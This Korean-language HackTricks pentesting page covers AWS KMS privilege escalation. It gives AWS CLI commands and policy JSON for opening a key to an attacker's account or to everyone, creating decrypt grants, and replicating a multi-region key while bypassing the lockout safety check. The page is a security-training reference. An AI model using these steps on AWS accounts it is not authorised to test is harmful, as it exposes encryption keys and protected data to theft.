AWS - KMS Privesc

Reading time: 4 minutes

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

KMS

KMS에 대한 자세한 내용은 다음을 확인하세요:

AWS - KMS Enum

kms:ListKeys,kms:PutKeyPolicy, (kms:ListKeyPolicies, kms:GetKeyPolicy)

이 권한들로 키에 대한 액세스 권한을 수정하여 다른 계정이나 심지어 누구나 사용할 수 있게 만들 수 있습니다:

bash
aws kms list-keys
aws kms list-key-policies --key-id <id> # Although only 1 max per key
aws kms get-key-policy --key-id <id> --policy-name <policy_name>
# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
aws kms put-key-policy --key-id <id> --policy-name <policy_name> --policy file:///tmp/policy.json

policy.json:

json
{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<origin_account>:root"
},
"Action": "kms:*",
"Resource": "*"
},
{
"Sid": "Allow all use",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": ["kms:*"],
"Resource": "*"
}
]
}

kms:CreateGrant

이는 주체가 KMS 키를 사용하도록 허용합니다:

bash
aws kms create-grant \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
--grantee-principal arn:aws:iam::123456789012:user/exampleUser \
--operations Decrypt

warning

grant는 특정 유형의 작업만 허용할 수 있습니다: https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations

warning

grant가 생성된 후 KMS가 사용자가 키를 사용하도록 허용하기까지 몇 분이 걸릴 수 있다는 점에 유의하세요. 시간이 지나면 principal은 아무것도 지정할 필요 없이 KMS key를 사용할 수 있습니다.
하지만 grant를 즉시 사용해야 하는 경우 use a grant token (다음 코드를 확인하세요).
자세한 내용은 more info read this.

bash
# Use the grant token in a request
aws kms generate-data-key \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
–-key-spec AES_256 \
--grant-tokens $token

다음과 같이 grant of keys를 나열할 수 있다는 점에 유의하세요:

bash
aws kms list-grants --key-id <value>

kms:CreateKey, kms:ReplicateKey

이 권한들로 다른 리전에서 다른 정책을 가진 multi-region enabled KMS key를 복제할 수 있습니다.

따라서 공격자는 이를 악용해 키에 대한 privesc를 얻어 이를 사용할 수 있습니다.

bash
aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml

{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "kms:*",
"Resource": "*"
}
]
}

kms:Decrypt

이 권한을 통해 키를 사용하여 일부 정보를 복호화할 수 있습니다.
자세한 내용은 다음을 확인하세요:

AWS - KMS Post Exploitation

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기